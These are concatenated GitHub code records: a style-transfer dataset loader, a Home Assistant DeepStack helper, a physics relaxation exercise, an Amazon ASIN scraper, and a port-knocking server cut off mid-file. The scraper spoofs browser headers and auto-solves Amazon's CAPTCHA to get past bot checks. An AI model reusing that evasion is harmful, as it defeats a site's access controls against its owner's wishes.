* img_Q, 0, 1)\n image_B = th.clamp(img_Y - 1.105 * img_I + 1.705 * img_Q, 0, 1)\n return th.stack([image_R, image_G, image_B], dim=1)\n\n\ndef norm(tensor):\n normalize = th_trans.Normalize(mean=my_format[0],\n std=my_format[1])\n return normalize(tensor)\n\n\ndef denorm(tensor, device):\n std = th.tensor(my_format[1]).reshape(-1, 1, 1).to(device)\n mean = th.tensor(my_format[0]).reshape(-1, 1, 1).to(device)\n res = th.clamp(tensor * std + mean, 0, 1)\n return res\n\n\ndef images_camp(images):\n b, c, h, w = images.shape\n Imax, _ = th.max(images.view(b, c, -1), dim=2)\n Imin, _ = th.min(images.view(b, c, -1), dim=2)\n out = (images - Imin.view(b, c, 1, 1)) / (Imax.view(b, c, 1, 1) - Imin.view(b, c, 1, 1))\n return out\n\n\ndef color_cov_sqrt(images):\n b, c, h, w = images.shape\n img_mean = th.mean(images, (2, 3))\n img_temp1 = images.view([b, c, 1, -1]) - img_mean.view([b, c, 1, 1])\n img_temp2 = th.matmul(img_temp1.permute(0, 3, 1, 2), img_temp1.permute(0, 3, 2, 1))\n img_cov = th.sum(img_temp2, dim=1) / (h * w)\n img_cov_sqrt = []\n for cov in img_cov:\n img_cov_eig, img_cov_eig_vector = cov.eig(eigenvectors=True)\n cov_sqrt = th.mm(th.mm(img_cov_eig_vector, th.diag_embed(th.pow(img_cov_eig[:, 0], 0.5))),\n img_cov_eig_vector.permute(1, 0))\n img_cov_sqrt.append(cov_sqrt)\n return th.stack(img_cov_sqrt)\n\n\ndef color_transfer(content, style):\n \"\"\"\n To match images`s color in Image Analogies\n If can`t, return style images originally.\n :param content: a tensor for match color, with BxCxHxW\n :param style: a tensor for style images, with BxCxHxW\n :return: a tensor with BxCxHxW\n \"\"\"\n b, c, h, w = style.shape\n content_cq = color_cov_sqrt(content)\n style_cq = color_cov_sqrt(style)\n\n _skip_list = set()\n _sample_fin = th.isfinite(th.stack([content_cq, style_cq], dim=1))\n _sample_det = style_cq.det().abs() < 1e-9\n for ib in range(b):\n if not _sample_fin[ib].all():\n _skip_list.add(ib)\n if _sample_det[ib]:\n style_cq[ib] 
= th.eye(3)\n                _skip_list.add(ib)\n\n    mat_Aia = th.bmm(content_cq, style_cq.inverse())\n    vator_b = th.mean(content, (2, 3)) - th.bmm(mat_Aia, th.mean(style, (2, 3)).unsqueeze(-1)).squeeze(-1)\n\n    out_images = []\n    for ib in range(b):\n        if ib in _skip_list:\n            out_images.append(style[ib])\n        else:\n            out_img = (th.matmul(mat_Aia[ib], style[ib].permute(1, 2, 0).unsqueeze(-1)).squeeze(-1)\n                       + vator_b[ib].view(1, 1, c)).permute(2, 0, 1)\n            out_images.append(out_img)\n    out_images = images_camp(th.stack(out_images, dim=0))\n    return out_images\n\n\ndef color_channel_cap(content_channel, style_channel):\n    b, _, _ = content_channel.shape\n    c_mean = th.mean(content_channel, (1, 2)).view(-1, 1, 1)\n    s_mean = th.mean(style_channel, (1, 2)).view(-1, 1, 1)\n    c_std = th.std(content_channel, (1, 2)).view(-1, 1, 1)\n    s_std = th.std(style_channel, (1, 2)).view(b, 1, 1)\n    out_style_channel = c_std / s_std * (style_channel - s_mean) + c_mean\n    return out_style_channel\n\n\ndef color_transfer_reinhard(content, style):\n    \"\"\"\n    To match images' color in Reinhard\n    :param content: a tensor for match color\n    :param style: a tensor for style images\n    :return: a tensor with BxCxHxW\n    \"\"\"\n    content_yiq = trans_rgb2yiq(content)\n    style_yiq = trans_rgb2yiq(style)\n    out_yiq = []\n    for c, s in zip(content_yiq, style_yiq):\n        out_yiq.append(color_channel_cap(c, s))\n    out_rgb = trans_yiq2rgb(out_yiq[0], out_yiq[1], out_yiq[2])\n\n    return out_rgb\n\n\nclass PreprocessDataset(Dataset):\n    \"\"\"\n    Dataset Object with resized and transform\n    \"\"\"\n\n    def __init__(self, content_dir, style_dir, transforms=trans):\n        \"\"\"\n        Dataset initial function.\n        :param content_dir: str or Path object\n        :param style_dir: str or Path object\n        :param transforms: torchvision's transforms object, default: Compose(RandomCrop-256 + ToTensor)\n        \"\"\"\n        content_dir_resized = Path(content_dir) / '_resized'\n        style_dir_resized = Path(style_dir) / '_resized'\n        if not content_dir_resized.exists():\n            content_dir_resized.mkdir()\n            self._resize(content_dir, content_dir_resized)\n        if not style_dir_resized.exists():\n            style_dir_resized.mkdir()\n            self._resize(style_dir, style_dir_resized)\n\n        content_images = []\n        style_images = []\n        for s_img in style_dir_resized.glob('*'):\n            style_images.append(s_img)\n        for c_img in content_dir_resized.glob('*'):\n            content_images.append(c_img)\n\n        if len(style_images) * 2 < len(content_images):\n            style_images = style_images * 2\n        self.image_pairs = list(zip(content_images, style_images))\n        self.transforms = transforms\n\n    @staticmethod\n    def _resize(source_dir, target_dir):\n        print(f'Start resizing {source_dir} ')\n        for i in tqdm(Path(source_dir).glob('*')):\n            filename = i.stem + '.bmp'\n            try:\n                # image = io.imread(str(i))\n                image = cv.imread(str(i))\n                if len(image.shape) == 3 and image.shape[-1] == 3:\n                    H, W, _ = image.shape\n                    if H < W:\n                        ratio = W / H\n                        H = 512\n                        W = int(ratio * H)\n                    else:\n                        ratio = H / W\n                        W = 512\n                        H = int(ratio * W)\n                    # image = transform.resize(image, (H, W), mode='reflect', anti_aliasing=True)\n                    image = cv.resize(image, (W, H), interpolation=cv.INTER_CUBIC)\n                    # io.imsave(os.path.join(target_dir, filename), image)\n                    cv.imwrite(str(Path(target_dir) / filename), image)\n            except:\n                continue\n\n    def __len__(self):\n        return len(self.image_pairs)\n\n    def __getitem__(self, index):\n        content_img, style_img = self.image_pairs[index]\n        content_img = Image.open(content_img)\n        style_img = Image.open(style_img)\n\n        if self.transforms:\n            content_img = self.transforms(content_img)\n            style_img = 
self.transforms(style_img)\n return content_img, style_img\n\n\ndef test01(tensor):\n tensor_yiq = trans_rgb2yiq(tensor)\n tensor_yiq_re_rgb1 = trans_yiq2rgb(0 * th.ones_like(tensor_yiq[0]), tensor_yiq[1], tensor_yiq[2])\n tensor_yiq_re_rgb2 = trans_yiq2rgb(tensor_yiq[0], th.zeros_like(tensor_yiq[1]), th.zeros_like(tensor_yiq[2]))\n\n show_tensor(tensor)\n show_tensor(tensor_yiq[0].unsqueeze(1).expand(-1, 3, -1, -1))\n show_tensor(tensor_yiq_re_rgb1)\n show_tensor(tensor_yiq_re_rgb2)\n\n\ndef test02(tensor):\n nt = norm(tensor)\n dn_nt = denorm(nt, 'cpu')\n\n print(tensor.std((1, 2)), tensor.mean((1, 2)))\n print(dn_nt.std((1, 2)), dn_nt.mean((1, 2)))\n\n print('nt:\\n', nt.std((1, 2)), nt.mean((1, 2)))\n\n\ndef test03(content, style):\n out = color_transfer(content, style)\n\n show_tensor(content)\n show_tensor(style)\n show_tensor(out)\n\n return out\n\n\nif __name__ == '__main__':\n import os\n from Source.myTools.TrainTools import show_tensor\n\n os.chdir('G:/Program/Git/My_Git/test/Grand_work/exam_01_VGG_19')\n\n img1 = Image.open('.dataset/My_dataset/test-1.bmp')\n img2 = Image.open('.dataset/My_dataset/content/lenna.jpg')\n img3 = Image.open('.dataset/My_dataset/content/golden_gate.jpg')\n img4 = Image.open('.dataset/My_dataset/style/candy.jpg')\n img5 = Image.open('.dataset/My_dataset/style/Composition-VII.jpg')\n\n t1 = trans(img1).unsqueeze(0)\n tensor_c1 = trans(img2).unsqueeze(0)\n tensor_c2 = trans(img3).unsqueeze(0)\n tensor_s1 = trans(img4).unsqueeze(0)\n tensor_s2 = trans(img5).unsqueeze(0)\n\n # test01(tensor_content)\n # test02(tensor_style)\n tensor_out = test03(tensor_c2, tensor_s1)\n", "repo_name": "linghtiin/Style_Transfer_color", "sub_path": "Source/myModels/dataset.py", "file_name": "dataset.py", "file_ext": "py", "file_size_in_byte": 9108, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torchvision.transforms.Compose", "line_number": 13, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 13, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomCrop", "line_number": 13, "usage_type": "call"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 14, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.clamp", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.clamp", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.clamp", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 33, "usage_type": "call"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 37, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 37, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.clamp", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.min", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.diag_embed", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.pow", "line_number": 66, "usage_type": 
"call"}, {"api_name": "torch.stack", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.isfinite", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.eye", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.bmm", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.bmm", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 112, "usage_type": "call"}, {"api_name": "torch.std", "line_number": 113, "usage_type": "call"}, {"api_name": "torch.std", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.utils.data.Dataset", "line_number": 136, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 148, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 149, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 172, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 172, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 176, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 188, "usage_type": "call"}, {"api_name": "cv2.INTER_CUBIC", "line_number": 188, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 190, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 190, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 199, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 199, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 200, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 200, "usage_type": "name"}, {"api_name": "torch.ones_like", "line_number": 210, "usage_type": "call"}, {"api_name": "torch.zeros_like", "line_number": 211, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 243, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 245, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 245, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 246, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 246, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 247, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 247, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 248, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 248, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 249, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 249, "usage_type": "name"}]} +{"seq_id": "36359709088", "text": "import logging\nimport voluptuous as vol\n\nfrom homeassistant.const import (CONF_HOST, CONF_PORT, ATTR_NAME, CONF_SSL)\nfrom homeassistant.helpers import config_validation as cv\nfrom homeassistant.components.image_processing import (CONF_CONFIDENCE)\n\nfrom .const import *\n\n_LOGGER = logging.getLogger(__name__)\n\nCONFIG_SCHEMA = vol.Schema({\n DOMAIN: vol.Schema({\n vol.Required(CONF_HOST): cv.string,\n vol.Optional(CONF_SSL): cv.boolean,\n vol.Required(CONF_PORT): cv.port,\n vol.Optional(CONF_UNKNOWN_DIRECTORY): cv.string,\n vol.Optional(CONF_ADMIN_KEY, default=''): cv.string,\n vol.Optional(CONF_API_KEY, default=''): cv.string\n 
}),\n}, extra=vol.ALLOW_EXTRA)\n\nSERVICE_REGISTER_FACE_SCHEMA = vol.Schema({\n vol.Required(ATTR_NAME): cv.string,\n vol.Required(FILE_PATH): cv.string,\n})\n\nSERVICE_DELETE_FACE_SCHEMA = vol.Schema({\n vol.Required(ATTR_NAME): cv.string\n})\n\nSERVICE_DISPLAY_RESPONSE_TIME_SCHEMA = vol.Schema({\n vol.Required(ATTR_ENABLED): cv.boolean,\n})\n\nSERVICE_CHANGE_CONFIDENCE_LEVEL_SCHEMA = vol.Schema({\n vol.Required(CONF_CONFIDENCE): vol.All(vol.Coerce(float), vol.Range(min=0, max=100))\n})\n\n\nclass HomeAssistant:\n def __init__(self, hass, allow_backup_restore):\n self._hass = hass\n self._allow_backup_restore = allow_backup_restore\n\n def initialize(self, service_change_confidence_level, service_display_response_time,\n service_register_face, service_list_faces, service_delete_face):\n self._hass.services.register(DOMAIN, SERVICE_CHANGE_CONFIDENCE_LEVEL, service_change_confidence_level,\n schema=SERVICE_CHANGE_CONFIDENCE_LEVEL_SCHEMA)\n\n self._hass.services.register(DOMAIN, SERVICE_DISPLAY_RESPONSE_TIME, service_display_response_time,\n schema=SERVICE_DISPLAY_RESPONSE_TIME_SCHEMA)\n\n self._hass.services.register(DOMAIN, SERVICE_REGISTER_FACE, service_register_face,\n schema=SERVICE_REGISTER_FACE_SCHEMA)\n\n if self._allow_backup_restore:\n self._hass.services.register(DOMAIN, SERVICE_LIST_FACES, service_list_faces)\n self._hass.services.register(DOMAIN, SERVICE_DELETE_FACE, service_delete_face,\n schema=SERVICE_DELETE_FACE_SCHEMA)\n\n def is_valid_file_path(self, file_path):\n \"\"\"Check that a file_path points to a valid file.\"\"\"\n result = False\n\n try:\n cv.isfile(file_path)\n\n result = self._hass.config.is_allowed_path(file_path)\n except vol.Invalid:\n _LOGGER.error(f'Invalid file path: {file_path}')\n\n return result\n\n def is_valid_directory_path(self, directory_path):\n \"\"\"Check that a file_path points to a valid file.\"\"\"\n result = False\n\n try:\n cv.isdir(directory_path)\n\n result = self._hass.config.is_allowed_path(directory_path)\n except vol.Invalid:\n _LOGGER.error(f'Invalid directory path: {directory_path}')\n\n return result\n\n def fire_event(self, name, data):\n _LOGGER.info(f'Firing event: {name} with the following data: {data}')\n\n self._hass.async_add_job(self._hass.bus.async_fire, name, data)\n\n def path_builder(self, file_name):\n path = self._hass.config.path(file_name)\n\n return path\n\n def display_message(self, message):\n _LOGGER.info(f'Display message: {message}')\n\n self._hass.components.persistent_notification.create(message,\n title=NOTIFICATION_FACE_LIST,\n notification_id=NOTIFICATION_FACE_LIST)\n", "repo_name": "elad-bar/ha-deepstack", "sub_path": "custom_components/deepstack/home_assistant.py", "file_name": "home_assistant.py", "file_ext": "py", "file_size_in_byte": 3740, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 10, "usage_type": "call"}, {"api_name": "voluptuous.Schema", "line_number": 12, "usage_type": "call"}, {"api_name": "voluptuous.Schema", "line_number": 13, "usage_type": "call"}, {"api_name": "voluptuous.Required", "line_number": 14, "usage_type": "call"}, {"api_name": "homeassistant.const.CONF_HOST", "line_number": 14, "usage_type": "argument"}, {"api_name": "voluptuous.Optional", "line_number": 15, "usage_type": "call"}, {"api_name": "homeassistant.const.CONF_SSL", "line_number": 15, "usage_type": "argument"}, {"api_name": "voluptuous.Required", "line_number": 16, "usage_type": "call"}, 
{"api_name": "homeassistant.const.CONF_PORT", "line_number": 16, "usage_type": "argument"}, {"api_name": "voluptuous.Optional", "line_number": 17, "usage_type": "call"}, {"api_name": "voluptuous.Optional", "line_number": 18, "usage_type": "call"}, {"api_name": "voluptuous.Optional", "line_number": 19, "usage_type": "call"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 14, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 14, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.boolean", "line_number": 15, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 15, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.port", "line_number": 16, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 16, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 17, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 17, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 18, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 18, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 19, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 19, "usage_type": "name"}, {"api_name": "voluptuous.ALLOW_EXTRA", "line_number": 21, "usage_type": "attribute"}, {"api_name": "voluptuous.Schema", "line_number": 23, "usage_type": "call"}, {"api_name": "voluptuous.Required", "line_number": 24, "usage_type": "call"}, {"api_name": "homeassistant.const.ATTR_NAME", "line_number": 24, "usage_type": "argument"}, {"api_name": "voluptuous.Required", "line_number": 25, "usage_type": "call"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 24, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 24, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 25, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 25, "usage_type": "name"}, {"api_name": "voluptuous.Schema", "line_number": 28, "usage_type": "call"}, {"api_name": "voluptuous.Required", "line_number": 29, "usage_type": "call"}, {"api_name": "homeassistant.const.ATTR_NAME", "line_number": 29, "usage_type": "argument"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 29, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 29, "usage_type": "name"}, {"api_name": "voluptuous.Schema", "line_number": 32, "usage_type": "call"}, {"api_name": "voluptuous.Required", "line_number": 33, "usage_type": "call"}, {"api_name": "homeassistant.helpers.config_validation.boolean", "line_number": 33, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 33, "usage_type": "name"}, {"api_name": "voluptuous.Schema", "line_number": 36, "usage_type": "call"}, {"api_name": "voluptuous.Required", "line_number": 37, "usage_type": "call"}, {"api_name": "homeassistant.components.image_processing.CONF_CONFIDENCE", "line_number": 37, "usage_type": "argument"}, {"api_name": "voluptuous.All", "line_number": 37, "usage_type": 
"call"}, {"api_name": "voluptuous.Coerce", "line_number": 37, "usage_type": "call"}, {"api_name": "voluptuous.Range", "line_number": 37, "usage_type": "call"}, {"api_name": "homeassistant.helpers.config_validation.isfile", "line_number": 67, "usage_type": "call"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 67, "usage_type": "name"}, {"api_name": "voluptuous.Invalid", "line_number": 70, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation.isdir", "line_number": 80, "usage_type": "call"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 80, "usage_type": "name"}, {"api_name": "voluptuous.Invalid", "line_number": 83, "usage_type": "attribute"}]} +{"seq_id": "71434918246", "text": "\"\"\"\nThis exercises asks us to use the relaxation method to find solutions to the equation:\n\nf(x) = 1 - e^(-cx)\n\nWhere c is a free parameter. Use the relaxation method to estimate f(x) while varying c. Plot the output.\n\nNote the regime change from when x = 0 to x > 0 . In physics this a phase transition called the percolation constant. In epidimeology, it is the epidemic threshold.\n\"\"\"\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n\ndef relaxation(consts, accuracy):\n c = consts[0]\n \n points = 300\n cpoints = np.linspace(0, 3, points)\n fx = []\n\n for c in cpoints:\n error = 1.0\n x1 = 1.0\n while error > accuracy:\n x1, x2 = 1 - np.exp(-c * x1), x1\n error = np.abs((x1 - x2)/(1 - np.exp(-2 * x1)/2))\n fx.append(x1)\n\n plt.plot(cpoints, fx)\n plt.xlabel('c, free parameter')\n plt.ylabel('fx')\n plt.ylim(-0.1, 1.1)\n plt.title('Percolation Tranisition')\n plt.savefig('Exercises/Chapter 6/6.8 percolation_transition.png', format='png')\n plt.show()\n return fx\n\nif __name__ == '__main__':\n \n sol = relaxation(consts = [2], accuracy = 1E-6)\n ", "repo_name": "Jormogundr/Computational-Physics", "sub_path": "Exercises/Chapter 6/6.10 Relaxation Method.py", "file_name": "6.10 Relaxation Method.py", "file_ext": "py", "file_size_in_byte": 1145, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.linspace", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": 
"name"}]} +{"seq_id": "32154577348", "text": "import re\nimport requests\nimport pandas as pd\nfrom time import time\n\nfrom bs4 import BeautifulSoup\n\nfrom amazoncaptcha import AmazonCaptcha\n\nimport warnings\n\nwarnings.filterwarnings(\"ignore\")\n\n_MAX_TRIAL_REQUESTS = 3\n\nheaders = {\n 'authority': 'www.amazon.com',\n 'dnt': '1',\n 'upgrade-insecure-requests': '1',\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/87.0.4280.88 Safari/537.36',\n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,'\n 'image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'sec-fetch-site': 'none',\n 'sec-fetch-mode': 'navigate',\n 'sec-fetch-dest': 'document',\n 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8',\n}\n\n\ndef solve_captcha(r):\n btf = BeautifulSoup(r.text)\n form = btf.find('form', attrs={'action': '/errors/validateCaptcha'})\n amzn = form.find('input', attrs={'name': 'amzn'})['value']\n img_url = form.find('img')['src']\n solution = AmazonCaptcha.fromlink(img_url).solve()\n session.get(f'https://www.amazon.com/errors/validateCaptcha?amzn={amzn}&amzn-r=%2F&field-keywords={solution}')\n\n\ndef valid_page(html_content):\n \"\"\"Check if the page is a valid result page\n (even if there is no result)\"\"\"\n if \"Sign in for the best experience\" in html_content:\n valid_page_bool = False\n elif 'Enter the characters you see below' in html_content:\n valid_page_bool = False\n elif \"The request could not be satisfied.\" in html_content:\n valid_page_bool = False\n elif \"We couldn't find that page\" in html_content:\n valid_page_bool = False\n elif \"Robot Check\" in html_content:\n valid_page_bool = False\n else:\n valid_page_bool = True\n return valid_page_bool\n\n\ndef query(url):\n for i in range(_MAX_TRIAL_REQUESTS):\n req = session.get(url)\n if not valid_page(req.text):\n if 'Enter the characters you see below' in req.text:\n solve_captcha(req)\n else:\n raise Exception('not valid page from \"SessionThread\"')\n else:\n return req\n raise Exception('not valid page from \"SessionThread\"')\n\n\ndef scrap_asins(url):\n page_one = query(url)\n page_two = query(f'{url}/ref=zg_bs_pg_2?_encoding=UTF8&pg=2')\n\n asins = []\n for page in [page_one, page_two]:\n soup = BeautifulSoup(page.text)\n asins += [re.findall(r\"\\/dp\\/[\\d\\w]{10}\", li.find_all('a')[0]['href'])[0][len('/dp/'):] for li in\n soup.findAll('li', attrs={'class': 'zg-item-immersion'}) if li.find_all('a')]\n return asins\n\n\nsession = requests.Session()\nsession.headers.update(headers)\n\nstart_time = time()\n\nxl = pd.ExcelFile('data/input categories.xlsx')\nwriter = pd.ExcelWriter(f'data/output asins.xlsx', engine='xlsxwriter')\n\ndf = xl.parse(xl.sheet_names[0], header=None)\nfor _, row in df.iterrows():\n title = row[0]\n url_link = row[1]\n data = scrap_asins(url_link)\n pd.DataFrame(data).to_excel(writer, sheet_name=title, header=False, index=False)\n\nwriter.save()\n\nprint(time() - start_time, 'seconds')\n", "repo_name": "evgenpatrushev/Amazon_work", "sub_path": "asins_by_categories.py", "file_name": "asins_by_categories.py", "file_ext": "py", "file_size_in_byte": 3151, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "warnings.filterwarnings", "line_number": 12, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 32, "usage_type": "call"}, {"api_name": "amazoncaptcha.AmazonCaptcha.fromlink", "line_number": 36, 
"usage_type": "call"}, {"api_name": "amazoncaptcha.AmazonCaptcha", "line_number": 36, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 77, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 78, "usage_type": "call"}, {"api_name": "requests.Session", "line_number": 83, "usage_type": "call"}, {"api_name": "time.time", "line_number": 86, "usage_type": "call"}, {"api_name": "pandas.ExcelFile", "line_number": 88, "usage_type": "call"}, {"api_name": "pandas.ExcelWriter", "line_number": 89, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 96, "usage_type": "call"}, {"api_name": "time.time", "line_number": 100, "usage_type": "call"}]} +{"seq_id": "21249895609", "text": "import pydivert\r\nimport argparse\r\nimport subprocess\r\nimport os\r\nimport sys\r\nimport time\r\nimport re\r\nimport copy\r\nfrom dataclasses import dataclass\r\n\r\n# after python 3.7\r\n@dataclass\r\nclass config_entry:\r\n name: str\r\n sequence: list\r\n seq_timeout: int\r\n command: str\r\n protocol: str\r\n\r\n@dataclass\r\nclass candidate:\r\n name: str\r\n start: float\r\n end: float\r\n sequence: list\r\n command: str\r\n protocol: str\r\n src_addr: str\r\n\r\n@dataclass\r\nclass interface:\r\n index: int\r\n name: str\r\n \r\ndef get_parser():\r\n parser = argparse.ArgumentParser(description='Windows Port-knocking Server')\r\n \r\n parser.add_argument('-c', '--config', \r\n default='./knockd.conf',\r\n help='use an alternate config file (default ./knockd.conf)',\r\n type=str)\r\n parser.add_argument('-d', '--debug', \r\n action='store_true',\r\n help='debug mode')\r\n parser.add_argument('-i', '--interface',\r\n nargs='*',\r\n type=int,\r\n help='index of network interface to liston on (default all)')\r\n parser.add_argument('-l', '--list_interface',\r\n action='store_true',\r\n help='list all of the network interface')\r\n return parser\r\n\r\n# global variable\r\ninterface_list = []\r\nselected_interface = []\r\nparser = get_parser()\r\nargs = parser.parse_args()\r\nconfig = {}\r\nall_port = dict()\r\nmatch_queue = []\r\n\r\ndef get_interface():\r\n global selected_interface\r\n output = subprocess.getoutput(\"netsh int ipv4 show interfaces\")\r\n lines = output.split('\\n')\r\n for i, l in enumerate(lines):\r\n value = l.split()\r\n if not value: continue\r\n if i < 3: continue # get ride of useless info\r\n interface_list.append(interface(int(value[0]), ' '.join(value[4:])))\r\n \r\n # list interface\r\n if args.list_interface:\r\n print(f'\\n=========== interface ===========')\r\n for i in interface_list:\r\n print(i)\r\n print(f'=================================\\n')\r\n sys.exit()\r\n \r\n # selected interface\r\n if args.interface:\r\n selected_interface = args.interface\r\n for i in args.interface:\r\n for j in interface_list:\r\n if i == j.index:\r\n break\r\n else: \r\n sys.exit(\"[Error] Selected interface not existied!\")\r\n else:\r\n for i in interface_list:\r\n selected_interface.append(i.index)\r\n if args.debug: print(f\"Selected interface: {selected_interface}\")\r\n \r\ndef read_config():\r\n if args.debug: print(f\"[+] config file: {args.config}\")\r\n try:\r\n config_file = open(args.config, 'r')\r\n except:\r\n sys.exit(\"[Error] Wrong config file location!\")\r\n name = ''\r\n for line in config_file.readlines():\r\n line = line.strip()\r\n if re.search('\\[[a-zA-Z0-9 ]+\\]', line):\r\n name = line.strip(\"[]\")\r\n config[name] = {}\r\n elif line.strip() == '':\r\n continue\r\n elif name != '':\r\n pair = line.split('=', 1) # split at 
